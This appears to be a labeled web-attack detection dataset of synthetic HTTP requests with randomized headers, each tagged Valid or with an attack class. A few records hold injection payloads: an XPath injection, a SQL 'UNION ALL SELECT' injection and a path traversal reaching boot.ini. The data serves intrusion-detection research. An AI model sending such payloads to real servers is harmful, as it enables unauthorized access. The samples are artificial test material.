GET /o-ONWhsNRZoSMLS/_YdPmailw06/glU4Yc0dLbhGkUL/r0WftpcURDJ7LS/bBk/multa6i.php4?97qsmc45lrlixk=s3u0hA1lsegstenttj&Ohote=eBl7Syv%40qLw&ecAndcubsnd=hbinwl&edeezfawsbcwr=eiqacmn HTTP/1.0
Host: 234.231.236.33
Connection: eiumgir
Accept: */*;q=0.3
Accept-Charset: iso-8859-3, iso-8859-3, utf-7, euc-jp;q=0.1, iso-8859-8;q=0.9
Accept-Encoding: 
Accept-Language: rcersn-rtsjee, llgdaq-ie;q=0.9, DuN-nce;q=0.1, neiditd-grva4;q=0.6
Cache-Control: no-transform
Client-ip: 68.69.216.23
Cookie: xG3fwtEde=ldtsinclude71+ioytrasmaa5 ;ae=24716643;ztnixog1=sNA@etea0pq
Cookie2: $Version="75"
Date: Thu, 18 Sep 08 17:18:46 GMT
ETag: W/"qN046fEpv6REy5KApOF"
Expect: caxlro
From: DbbWly@nefyhddm.ch
If-Modified-Since: Thu, 15 Jun 06 03:54:40 UTC
If-Unmodified-Since: Fri, 26 Nov 04 04:50:43 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 11 Jul 07 14:58:48 GMT
Max-Forwards: 683
MIME-Version: 0.4
Pragma: mr4n='tre'
Proxy-Authorization: Digest username="iWrams"
Authorization: Digest username="5hs5tlr"
Range: 541443-68,844-,77-861439
Referer: http://tcno.be/foEtne/eenxayd/roiteN7/7eeKvtS.mspx
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.8 (compatible; MSIE 8.1; Linux i386; irAt)
UA-CPU: x86
UA-Disp: 8170,9079,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0511x714
Via: 4.2 www.h9upnir.css, 9.5 www.psag.tiff:620
Transfer-Encoding: mttg
Upgrade: tohb/5.5, wosd/8.3, a7t/8.4
Warning: 019 www.rqism.png "eeerrEetourerTuu" 
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 8963689877727
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 380
Start - Id: 35596
class: XPathInjection
GET /UlnsodN.swf?8oirdE=rognbia1%27ghwindow.open%3Dd%3Fjrbgsoundeh&BP4VyV32BacceptJ=43031&1ZHMEU4hJPZ=8039397&omDtKM@EiT9=7++++or+++laooa2%2FdE%2F2%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D++or+++++847%3D&ys3AsiouIh0orhc=7an-deletediv%3D4cyRSityun3%7C&Hmt@j-P7wvgk=3197120&sHnaeGtns=bDislrcrqweenm&gns=1&nenobet=gorittchenqamebt&yecJNpexecD_X4script=972552&tbetnhmnl=Oit%5C&0rta=tsaaik4ck HTTP/1.0
Host: www.thdT.it:80
Connection: 5looTohR
Accept: text/*
Accept-Charset: x-mac-greek
Accept-Encoding: compress;q=0.5, deflate;q=0.4
Accept-Language: et-emn;q=0.7, hxlcul5-sr0duqo, ro-ehs;q=0.4
Cache-Control: only-if-cached
Client-ip: 180.187.68.18
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="7"
Date: Fri, 15 Jan 10 13:43:45 UTC
ETag: W/"7umuTM27UJFVw2-bKB"
Expect: 100-continue
From: hsgss@kOcgeesht.ch
If-Modified-Since: Sat, 24 Jun 06 20:37:15 UTC
If-Unmodified-Since: Mon, 13 Aug 07 17:10:52 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "rwOo.Tuonx4ayEEa"
If-Range: Mon, 26 Feb 07 17:08:41 CET
Max-Forwards: 97
MIME-Version: 4.7
Pragma: o='aeU'
Proxy-Authorization: NTLM b2RXcmx2M25sdGE2b3dvcmVIaGxuZWh5b2lzdGlXWGRvdnlvUm0xZXQxbU8zYm0=
Authorization: Basic WXBkYWVkOmhlOWVkbmVu
Range: 1278-6
Referer: http://AptP.fr/AreptO/da6sen8d/ttutdgix/osoIc/ezilIwn.asp
TE: trailers,trailers,chunked
Trailer: Warning
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 2.6; 5s-ng; rv:3.7.8) Gecko/37410202
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x439
Via: 6.9 www.pa3eVo.css, nrop4/9.3 www.aeas.gif:883, 1.7 www.yfewB.jpeg
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35596
Start - Id: 17536
class: Valid
GET /nimeju7et4m/Fs/iayHtkyahA/ShlU/t2jhIwhLmFQ/FtmpDchild/KudHUwget_0select1SO/ll5zqFT/2jtennSuuifio4e/mGbcW/sv3/tIgd.html?tlr=31809&BZdH=86574&gewr=+lbal+genm%3Cd&lannruhsdbnq8m=e%3A%24is%28eetq%5Doa%26%2Ffh6&wddVrs=bSNctwdMenetcatoiymiframe&pEaeOlL=+rreDzl+amto4al&ezeauatgtz=hOaeAemaDilq&inrtne=9w&dmua=a_hzpCsF6xj&816z3Mc4yJ-=weC7faymoAn&nnkn=haascriptN&mh3meoui=iil5i3cale&vDUreplaceC=0&vzgdyli=242932 HTTP/1.0
Host: 125.132.44.69
Connection: sEse1Tr
Accept: application/rtf, video/*
Accept-Charset: euc-kr;q=0.4, koi8;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 49.240.156.62
Cookie: Mqnnr16Ar4=sain3uri374aet5e
Cookie2: $Version="7"
Date: Wed, 08 Aug 07 13:19:17 GMT
ETag: W/"hdzXRzmYIBU_M9P1Xa7"
Expect: 1hraA=tnlnl;oei4=sxdha
From: eqwswlc@oml3s.net
If-Modified-Since: Thu, 07 Jan 10 01:16:04 CET
If-Unmodified-Since: Mon, 22 Dec 08 06:45:57 GMT
If-Match: *
If-None-Match: "xrtMhPFqpMNgSY4Km"
If-Range: Tue, 25 Dec 07 02:37:12 GMT
Max-Forwards: 42
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: y31i oT4idrMo=estc2ua
Authorization: Basic YWVlaHI6dG1lZUk=
Range: -93,-08,01267-
Referer: http://www.Aeory5c3.uk/r2helhaw/ETsir/ifBhf/aehoa/hEttn.png
TE: trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/2.8 (X11; U; Linux i386 7.3; eo-as; rv:3.2.8) Gecko/63550894
UA-CPU: StrongARM
UA-Disp: 3316,965,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 845x6872
Via: 3.1 www.mkdKwO.tiff:39, FTP/1.5 www.ybsgon.shtml:30625, HTTP/9.1 93.49.128.145
Transfer-Encoding: meeee; eno3qOet=essNE7x
Upgrade: qnef/6.1, teHndi/9.7, n5GAtw/8.0, Epe/2.3
Warning: 578 www.cuZgchp.tiff "esuto1wenhlasinfem" "Mon, 23 Mar 09 10:21:32 UTC"
X-Forwarded-For: 108.35.186.201
X-Serial-Number: 8998788877117234588
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17536
Start - Id: 28625
class: Valid
GET /6iOhninxu/dsaHojsetv4stieq/fljottapef8a74mhra/i2mIaornWtsp/eiyesey/Q9eg/oetaEOontPiiwftz7/ierstistRe8rtFeroe/2ilpvhtt/eRQVqn/atsxpSaiide.shtml?ehbabotso=rana%7Edez&et8faibx=w+Tz0stqtty6dqrkswzt&saRoc=eoe5+te&tXhexjs=riekaa3&etcqb=Sbin&heoa=01721&hauh=ninsert%28&mlexecdaprocessing-instructionsamkscriptsock_stream=b%3Bt&7ro=eeno&TM6.Pbn94oZ5=hqknoccdeelfdn HTTP/1.1
Host: www.lele.ch
Connection: keep-alive
Accept: image/gif;q=0.9, image/*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: chsg-lednn0a6;q=0.4, ai-nrby, ifdszs-SojMhea, cipen-7teNRrsi, grenrst-t
Cache-Control: no-store
Client-ip: 155.116.41.99
Cookie: ai5oriir56=98684;9lwdthe=8283;olaaceir=ho i't;nheiE~&i;tmtnT=62938428;eJex7rpdtstrh=4960676264
Cookie2: $Version="18"
Date: Sun, 11 Oct 09 02:08:17 CET
ETag: "m61Hns7ULAUNoP7"
Expect: 100-continue
From: f1stea@ipiruhaos4.ch
If-Modified-Since: Fri, 25 Jul 08 15:13:16 GMT
If-Unmodified-Since: Sun, 18 May 08 12:46:49 GMT
If-Match: "s-qZoWpiWTLLlXv"
If-None-Match: "bZ5e7l@ncYqBmZKZXB"
If-Range: Sat, 02 Jun 07 01:53:02 CET
Max-Forwards: 4
MIME-Version: 9.3
Pragma: ep=fRnwaa
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Basic eXNodHQ6YXRmZWJ0Y0I=
Range: 554798-,-48,6195-
Referer: http://xa2x.cz/Gnnhiwet/1avnio/le5zto/01loeadw.shtml
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.8 (X11; U; Open BSD i586 0.6; or-db; rv:5.8.5) Gecko/08580182
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 680x3732
Via: bhhdo/6.8 106.84.107.67, 3tdth/6.2 165.42.233.117:63, abh/5.2 28.101.108.21
Transfer-Encoding: gzip
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 540 www.aacWusmD.jpeg "ehptcl" "Thu, 30 Mar 06 12:01:08 GMT"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6114886940251
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28625
Start - Id: 25253
class: Valid
GET /rM6cIK6VbW6ZR.l.asmx?qe=ntdl9ssI+&oueonjjarrT=draa1&e3t=tie+eG%26nqd&0UM8zLOE=viideleNe&rtir=g&iosaJneMls=tIiQK2Sk&odb0shesletdha=onwherei%3AYeinlink+eqy4w HTTP/1.0
Host: 115.209.227.191:80
Connection: close
Accept: application/rtf, application/postscript
Accept-Charset: windows-1252;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 216.47.86.82
Cookie: CevalVXRDdrop=955156152;hQHmmail=03759;ne3Nrqehe=25279;yaendliCp=654882;enhttRut=8xTZU;siloehgeimehe1=iRmsrskcer9O
Cookie2: $Version="516"
Date: Sat, 31 May 08 19:49:18 CET
ETag: W/"WVWvSSXvDPhasuV"
Expect: 100-continue
From: e8ue@ouofs.gov
If-Modified-Since: Sun, 03 Jul 05 16:09:29 CET
If-Unmodified-Since: Sat, 04 Jul 09 12:40:52 UTC
If-Match: "e0avX5__iy3iCivEo"
If-None-Match: "lnNug96jF6gEhcRK7Y"
If-Range: Thu, 16 Feb 06 05:21:46 GMT
Max-Forwards: 95
MIME-Version: 3.2
Pragma: s='qcH'
Proxy-Authorization: 7ddr oinerrtu=Stpan
Authorization: thlane enhlacre=n2it
Range: 95085-,-05
Referer: /voahneri/yEzsdb7S/hPnetsbe/no7nsil/eulebna.exe
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/3.8 (Machintosh; U; PPC 1.8; Mr-ad; rv:5.3.8) Gecko/64122622
UA-CPU: PowerPC
UA-Disp: 8204,1865,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 765x9448
Via: FTP/7.2 www.ihf79m.jpeg, FTP/2.5 www.tw2ab.js, HTTP/1.5 149.183.19.219
Transfer-Encoding: compress
Upgrade: 1oew6/6.7, 13a/4.7, aismae/7.4
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 97.101.10.212
X-Serial-Number: 355160379643379
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25253
Start - Id: 26098
class: Valid
GET /JsKo./alDucyKqaLniwAo/YqG2K/pItfrQ5iy/rNq1u/tk3itzterh2u/7@95hoIqXn/tQ-c4TFKM7JNV/JiDopen34IZadmindocumentXwz.png?metya53nrebfn=on%5C%3B%40&wRnkrdnthco=emQVA&todmyezroeag1S2=2041933114 HTTP/1.1
Host: 7.120.167.174
Connection: close
Accept: application/x-tar;q=0.8, text/html;q=0.6
Accept-Charset: x-mac-korean;q=0.3, windows-1255;q=0.6, iso-8859-15, iso-8859-3;q=0.4, euc-jp;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=74671
Client-ip: 104.91.44.192
Cookie: PN8dfLBt=wmtias iri
Cookie2: $Version="1"
Date: Mon, 24 Aug 09 06:52:39 GMT
ETag: "Ql9OThmryf.DkekWJs"
Expect: rbrac6=FnS6;tssyaNqE
From: onjJtaeo@rtkFe9o2gi.st
If-Modified-Since: Sun, 18 Sep 05 17:06:51 CET
If-Unmodified-Since: Sat, 21 Feb 09 24:48:44 CET
If-Match: "LWxjqfSrilakD1UoU"
If-None-Match: "CQr8Ek@Odyj1YUA"
If-Range: Sun, 02 Oct 05 08:02:03 UTC
Max-Forwards: 562
MIME-Version: 4.2
Pragma: Uhbsc='ssohhs4n'
Proxy-Authorization: Digest uri=http://tehX8m.it/7nfoxbtj/obi9n.gif
Authorization: Basic YWNvb3I6b3dxbg==
Range: -41,2933-4708,1-5204
Referer: http://d7yr.ch/edqlw.pl
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/4.1 (X11; U; SunOS sun4u 4.1; ti-am; rv:1.9.3) Gecko/54639893
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 096x0326
Via: 0.8 www.ayvteen.html
Transfer-Encoding: deflate
Upgrade: ofesrr/6.5, wiTer/0.7
Warning: 624 www.0t7ct.css "Ahem" 
X-Forwarded-For: 129.2.245.208
X-Serial-Number: 07602073887440146
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26098
Start - Id: 31838
class: Valid
GET /eRLSPDVK./is/hHT/dfknlr/P8prmG_O5childd0K8Nt/@wy0exec6E0s-/aehe/likebetweenHv/Mjb/hoonarcotIa/oC7WPi7h.msf?Aeelam=088862217 HTTP/1.0
Host: www.hSsxolsOn.it
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15;q=0.8, cp-950;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 111.91.155.175
Cookie: MNep=9973692
Cookie2: $Version="945"
Date: Wed, 16 Apr 08 19:40:36 CET
ETag: W/"gde8Dk70UHJfStlf"
Expect: 100-continue
From: tte0c@9tOsemgp.be
If-Modified-Since: Wed, 06 May 09 10:23:25 UTC
If-Unmodified-Since: Wed, 09 Aug 06 04:20:04 UTC
If-Match: *
If-None-Match: *
If-Range: "4O6xVNNtIPuxvoQiFESH"
Max-Forwards: 0461
MIME-Version: 4.6
Pragma: t=sTyarbyo
Proxy-Authorization: NTLM TzB5dXJPcklpZG5lZXR0YzJ0OXczZXNucTh0bXRhZW5Rcm5tYTJ0ZHN0eHVpaQ==
Authorization: Thtifc rinsbhra=atiD
Range: -86
Referer: http://www.e5pH8.uk/cesosFr/rtue/ij1o/pttass2.gif
TE: gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/5.6 (X11; U; Unix 2.8; hy-it; rv:5.8.8) Gecko/16011436
UA-CPU: MIPS
UA-Disp: 423,7753,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2241x014
Via: 3.4 24.177.238.90
Transfer-Encoding: gzip
Upgrade: qa5i/7.3, DTs/6.0, haoaax/2.5, meeac6/4.7, ic6ntw/3.1
Warning: 195 19.136.88.173 "i5lytaiwejOlo" 
X-Forwarded-For: 50.243.79.16
X-Serial-Number: 69375200108238652611
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31838
Start - Id: 42517
class: SqlInjection
GET /wTlZ/idxwnUV/r-idcFyiHnJ3exg/ophhiiT1phjeph/aADp.OY/oondscaih/if/acceptBejDmV4@dEAJdiv/lictmyetc/ts/U7tslEom/eq3_SnGTi8QE5.css?tldsoTho=oz1nlaOwpas3&Treghaeelh9dhr=2223&l0nefvO9enn=ohJJma2yP4&dH=w&YdsITdtneae1i4=rwget&bar=026&rcwae=%27++%29+++UNION+++++ALL+SELECT+4274%2C15%2C15%2C480%2C417++FROM++ratl8Ha0+++WHERE+++%28+%27%27+%3D%27&qt=7&tezDaqtisan0n=hto&Dao=dxqRHP HTTP/1.1
Host: 88.229.55.117
Connection: joyhe
Accept: text/*, text/xml;q=0.0, text/*;q=0.6
Accept-Charset: iso-8859-5, x-mac-roman, utf-8, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 17.1.105.246
Cookie: aw3Nlgk=tiam;tnperlUt=hjdEX7Tk;daiRtn0ocpeuYar=01;ee=W
Cookie2: $Version="7"
Date: Sun, 07 Mar 10 13:43:14 CET
ETag: "QTJNs90GRqYP0w9uxk2"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Mon, 15 Dec 08 04:40:03 UTC
If-Unmodified-Since: Sun, 02 Sep 07 04:25:35 UTC
If-Match: *
If-None-Match: "lQZa0mll0TktaLwVKago"
If-Range: Sun, 27 Jun 04 18:12:58 UTC
Max-Forwards: 41
MIME-Version: 6.8
Pragma: 5b=lEen
Proxy-Authorization: ruen alnttzjd=aollyO
Authorization: NTLM ejBvcXRkeGNyZWV0aXV1QWl5YWNhdGZydW5zcnU4b3IxYW1reXVtTm4=
Range: 430-,2-8084
Referer: /btoh/sono.html
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/2.3 (Machintosh; U; Mac OS X 1.2; to-nO; rv:1.5.1) Gecko/00249087
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 0le/1.5 109.11.107.18
Transfer-Encoding: compress
Upgrade: iiruhh/4.7, Tnar/9.2, osto/3.0, ouuar/8.2
Warning: 860 252.84.118.119 "gymdt4aeaea4ehhX" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 68264538863472
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42517
Start - Id: 28930
class: Valid
GET /rXAf9Fj8Q71tUM32/HL/M@cattgSBkHGgVautoexec/is/rQQFcm9wf.swf?lelbdceoos4=s__V&srgrhetcqoji=4823501&eaeae=oKK&ikss=ejrnui&hrroe=ltmpzer2p+ent&sapo=6nAmo&tknhtcrtisols=sprocessing-instructionwherelea%3Eot%2F%5CgE&Srhhae=34950&ee9a3=hwdivmh2kegc&cdshwrftTn=ei5&gtadAoibhB0h=l3XVPT&ucn=ns4yoMoelhfsifw&dposm=cna8maa&cnworhsN6ke=4 HTTP/1.1
Host: 152.22.163.245
Connection: eePex
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: ntuien-ritAPoil, gnr-6;q=0.5
Cache-Control: no-store
Client-ip: 177.45.35.215
Cookie: cniuEroapdieCq=lkn8w5tdeleteunionchc;am5tj=32eplocationabeqtdnYedvarih;EeNhyey=ha-
Cookie2: $Version="5"
Date: Fri, 05 Dec 08 20:48:15 UTC
ETag: "nKSZYl2@q@b@wABR8d"
Expect: gnri
From: seleen@ed934Eesre.st
If-Modified-Since: Sat, 21 Jun 08 05:43:56 CET
If-Unmodified-Since: Fri, 06 Nov 09 17:54:37 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Feb 04 20:27:00 UTC
Max-Forwards: 70
MIME-Version: 6.1
Pragma: a379vS='ttcTs5'
Proxy-Authorization: NTLM cXV1dGNnRGR3dGFqZHN0ZW9oaDJpbGVhc2lhaWlodWFsbGVwbWpv
Authorization: dctt a3Dc=tEuT
Range: 47-52,104931-
Referer: http://lretemt.fr/yEthrbts/tBnLap.php3
TE: chunked,deflate;q=0.4
Trailer: Warning
User-Agent: aee1cuy
UA-CPU: Sparc
UA-Disp: 7993,791,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 3649x0845
Via: FTP/9.0 123.62.14.98:086, FTP/7.6 www.jAiovs.shtml, 2.4 www.lRssa.htm
Transfer-Encoding: compress
Upgrade: lImor/9.3
Warning: 849 www.nnoei.jpeg:1260 "it14qNa9s0atUtej4rn" "Sat, 10 Oct 09 18:20:14 CET"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7931332
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28930
Start - Id: 45633
class: PathTransversal
GET /iUzDxFjm8/uxta2ka6nieipRylirlr/d1hqaGtc4J7C/emse7ailaq/erMhtPeaf/jK7gdQUJSAFcG35/lB/mWXQXfOsoluAA_/ueoEieginnapvyas5xI/g6sZa4qo/fmailpX/QwW--6ee3DyNdc4.html?dn8xeuNleuhwe5=deSc&es07g=9ot%2F&onn8onavh=kugclg6stsi&0oyXXmochaPG=a%3A%5Cwinnt%5Cboot.ini HTTP/1.1
Host: 211.129.94.63
Connection: a1d1tt
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: kaed-nOdn1E, udDascat-bXeoln1o;q=0.5, Saufi-dsUm;q=0.1, x9-c;q=0.1
Cache-Control: only-if-cached
Client-ip: 95.84.73.85
Cookie: bpneC4=s47jioUt;iwmWagn=79823;no=esloorr9;iisstyleER251iUK=rOvw.URSn;mto25ai=nef;oqr=85799
Cookie2: $Version="56"
Date: Fri, 25 Nov 05 14:30:49 CET
ETag: "PKvFDYVY3-cjVvQ"
Expect: seoOtore
From: fqioEdd@asOPcwll8.com
If-Modified-Since: Fri, 25 Jan 08 20:39:13 GMT
If-Unmodified-Since: Sun, 12 Apr 09 05:34:59 GMT
If-Match: "wQuaWOgw95DBGHFkE"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 3.9
Pragma: t='n2egn'
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: NTLM bnZ5cXl2dW1pcmplZ2Jncm54bHpzYzV4bmFkcnRuZXRhdnk=
Range: 41-9272,-212,7881-582
Referer: /bvnti/zoln/Xeaz4.cfm
TE: chunked;q=0.5,trailers
Trailer: Upgrade
User-Agent: l0-ae-v http://www.Yemshh1.st
UA-CPU: Sparc
UA-Disp: 4093,504,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: 3.2 224.215.144.91, 5.2 19.73.6.4, oexa/5.0 149.232.132.146:7188
Transfer-Encoding: identity
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45633
Start - Id: 16007
class: Valid
GET /odtedk5g.swf?rxtt2tes4aoeet=56082931&l-U.GVd=816&ehdu5mc=809161343&54PR9=e3aitheso HTTP/1.0
Host: 91.189.52.107
Connection: j5ycrkn
Accept: audio/*;q=0.5
Accept-Charset: x-mac-ce, cp-932;q=0.9, cp-936, iso-8859-7
Accept-Encoding: deflate;q=0.2, deflate;q=0.4, gzip
Accept-Language: *;q=0.4
Cache-Control: max-stale=61915
Client-ip: 95.5.104.71
Cookie: ERshccaoT=hXkE;eeescrXehiryeia=a5fLb
Cookie2: $Version="9"
Date: Thu, 18 May 06 16:20:17 UTC
ETag: "e1JCGaEm1nbLjXOPF"
Expect: 100-continue
From: lnaihJy@tevauie.cz
If-Modified-Since: Thu, 07 Jan 10 14:53:15 CET
If-Unmodified-Since: Mon, 21 May 07 01:29:01 CET
If-Match: *
If-None-Match: "CYkTT@OILgOBRXZ5c"
If-Range: Wed, 07 Dec 05 02:20:47 GMT
Max-Forwards: 84
MIME-Version: 9.2
Pragma: marwiz=qienle
Proxy-Authorization: NTLM bnR0NWVwY2V3dGNyaGp4N29jdGNpZXN0aXNiMjNwaUNHc2VqOGVl
Authorization: Digest qop=auth
Range: 120-88552
Referer: /ttX8d/cQolg/uhmizr.htm
TE: trailers,deflate;q=0.0
Trailer: Trailer
User-Agent: Mozilla/9.7 (compatible; Konqueror/3.6; Windows NT; 3iesosg; beatt; 7pSh)
UA-CPU: PowerPC
UA-Disp: 049,9339,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 273x3585
Via: lsfeg/7.0 www.p0he60.gif, 7.7 www.elsadEdl.jpg:8015, FTP/1.7 www.eT09.html
Transfer-Encoding: deflate
Upgrade: fsn/0.0, tqdhe/7.9, jatac/9.9
Warning: 561 www.ei17228.html "tww6cihanh" 
X-Forwarded-For: 131.126.252.251
X-Serial-Number: 606819653
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16007
Start - Id: 5856
class: Valid
PUT /p1E51gqsynHG/Fj_K/UUeeptalxa/e0r5passthruWdFmEBsq6b/fJo1A5sUjOhW/@5s1sRgracceptselectmW/7eefg7rosoy2/nK.940sZADs.dll? HTTP/1.0
Content-Length: 152
Content-Language: stgt3h,cg6
Content-Encoding: gzip
Content-Location: /erEu/utdear/mltVjhsa/yeaH/wtit.bin
Content-MD5: ZG5iTmhvbnRkdXRuYmxldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jan 10 07:48:56 GMT
Last-Modified: Sat, 30 Jan 10 07:01:25 UTC
Host: www.GpzhRls.com
Connection: rlrsChl3
Accept: image/*;q=0.8, audio/basic
Accept-Charset: *
Accept-Encoding: compress;q=0.0, identity, identity, gzip;q=0.2, gzip
Accept-Language: al-q, gmk2y-eosdft, r1tshw-lbpho;q=0.5, dl-ewsm, ijxeekre-sezr
Cache-Control: only-if-cached
Client-ip: 1.68.14.125
Cookie: cion2nrepeuP=ntjcopy;u5msae66=67;o73equt=049;aonEE6heynt=eg;smge4eu3Honr=irSG5
Cookie2: $Version="7"
Date: Wed, 28 Mar 07 19:15:01 UTC
ETag: W/"Pi7TIRk8d9RbEJz1"
Expect: 100-continue
From: sePnirh@e4qne.de
If-Modified-Since: Thu, 25 Oct 07 15:55:14 CET
If-Unmodified-Since: Wed, 16 Jan 08 07:44:52 GMT
If-Match: "dntvSU0AMxP0WqjPtCR"
If-None-Match: "_jNPDUsI7tsioT1cL"
If-Range: *
Max-Forwards: 6
MIME-Version: 8.5
Pragma: t8iPu=io0eD
Proxy-Authorization: Digest nonce
Authorization: Basic aGh1aDVibjM6aU4zb2Z0aGo=
Range: 362988-,-381
Referer: /4ioeyht/e3et8.mdb
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.2 (Windows; U; Windows NT 9.2; mn-eu; rv:7.2.1) Gecko/55726295
UA-CPU: x86
UA-Disp: 746,1087,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3215x099
Via: egtscu/7.2 71.119.122.85:877, nSBlok/8.0 39.83.229.89
Transfer-Encoding: gzip
Upgrade: denqn/7.4, detea/0.8
Warning: 344 www.tvHas.htm "mrTIomoss3aw5NTeu" 
X-Forwarded-For: 10.142.82.192
X-Serial-Number: 8692230651
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

issot5rh=970264895&lmMrz=eaddhmaneaes8wf&tnwo0oxzac=209&ut0enem=sctAief 2&OcCj6XO1KO=9583&iImho=Crignn1hua&5her0isgLva=u4AOG&Da3=h9ibs&ccIpC5VG0r=s0idi 

End - Id: 5856
Start - Id: 3234
class: Valid
GET /aoucnTtaZo7elsoi/racenlicxgr.dll?rtuA8eenxteg=4&s7=93359&bzar=c HTTP/1.1
Host: www.jaac.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: c-oEgn0rna, Sc-bzwEw;q=0.7, kiE4t-I;q=0.8, nts-G7u, v-l
Cache-Control: min-fresh=4
Client-ip: 202.10.78.54
Cookie: 2ihAtnebepf=hc7vqsK0GudE;c5maolone=raqh3;hne=tP6bRu2pjo
Cookie2: $Version="940"
Date: Sun, 10 May 09 04:29:36 CET
ETag: "7M8BfkLionI7Wujw"
Expect: desjR
From: ee5cc9@atzl3njm.com
If-Modified-Since: Fri, 17 Mar 06 10:06:52 GMT
If-Unmodified-Since: Fri, 28 Aug 09 20:37:47 UTC
If-Match: "ugXW9@mqzcCKyCO3BJ"
If-None-Match: *
If-Range: Mon, 01 Oct 07 22:21:59 UTC
Max-Forwards: 251
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: NTLM ZWFuUnR1ZWNwYjVoaU9pYzhvYmZ0dDRuZmxmM2NkQXdlM25s
Range: -9119
Referer: http://www.lbrwco.de/kelnise/htnsrikv/2mmt/oeIS.fgf
TE: trailers,trailers
Trailer: Host
User-Agent: bdaxnpee/9.9.6.3.0
UA-CPU: PowerPC
UA-Disp: 531,159,8
UA-OS: WinNT
UA-Color: color32
